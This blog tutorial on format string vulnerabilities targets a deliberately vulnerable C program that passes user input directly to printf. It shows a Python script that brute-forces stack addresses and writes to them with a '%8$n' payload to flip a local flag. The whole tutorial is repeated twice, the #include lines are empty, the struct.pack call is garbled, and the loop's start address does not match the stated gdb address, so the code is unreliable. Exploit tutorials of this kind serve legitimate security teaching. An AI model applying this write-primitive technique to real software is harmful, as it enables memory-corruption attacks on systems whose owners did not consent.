In my previous post about format string vulnerability, I have explained how to use the global variable to alter the program control flow. This is a continuation. Here, we will see the same example code once again but the variable 'flag' as local variable. (To understand the difference, please read the previous post ).
Task :
Give input such that “You entered right parameter” is printed out.
Program :
#include
#include
int main(int argc, char **argv)
{
char password[255];
int flag;
flag = 0;
strncpy(password, argv[1], 255);
printf("\nEntered password is : ");
printf(password);
printf("\n");
if(flag)
{
printf("You entered right parameter\n");
}
else
{
printf("wrong input\n");
}
return 0;
}
....................................
The flag is not a global variable here. The flag is a local variable in main function which means it will be kept within the stack.
Get the address of ' flag' using the gdb. As we did in the previous exploitation we can
overwrite the content of address where the value of flag is stored. But since it is in stack ,
there may be a slight change in address where we compile the program outside gdb. So
we need to test all the addresses around the address we got from gdb inspection. We
need to write a script that tries to do this task.
(python script)
import struct
from subprocess import call
for i in range (0,100):
x=0xffffd301+i
print hex(x)
y=struct.pack("print y
call(["./2","AAA"+y+"%8$n"])
The address got from gdb is 0xffffd2ec
Printed and tried to overwrite the addresses around this address (if no correct result is obtained, replace the address in for loop with the last address we have checked so far and continue running in loop until we get the correct output)
Exit gdb and try outside of gdb.
Task :
Give input such that “You entered right parameter” is printed out.
Program :
#include
#include
int main(int argc, char **argv)
{
char password[255];
int flag;
flag = 0;
strncpy(password, argv[1], 255);
printf("\nEntered password is : ");
printf(password);
printf("\n");
if(flag)
{
printf("You entered right parameter\n");
}
else
{
printf("wrong input\n");
}
return 0;
}
....................................
The flag is not a global variable here. The flag is a local variable in main function which means it will be kept within the stack.
Get the address of ' flag' using the gdb. As we did in the previous exploitation we can
overwrite the content of address where the value of flag is stored. But since it is in stack ,
there may be a slight change in address where we compile the program outside gdb. So
we need to test all the addresses around the address we got from gdb inspection. We
need to write a script that tries to do this task.
(python script)
import struct
from subprocess import call
for i in range (0,100):
x=0xffffd301+i
print hex(x)
y=struct.pack("print y
call(["./2","AAA"+y+"%8$n"])
The address got from gdb is 0xffffd2ec
Printed and tried to overwrite the addresses around this address (if no correct result is obtained, replace the address in for loop with the last address we have checked so far and continue running in loop until we get the correct output)
Exit gdb and try outside of gdb.
No comments:
Post a Comment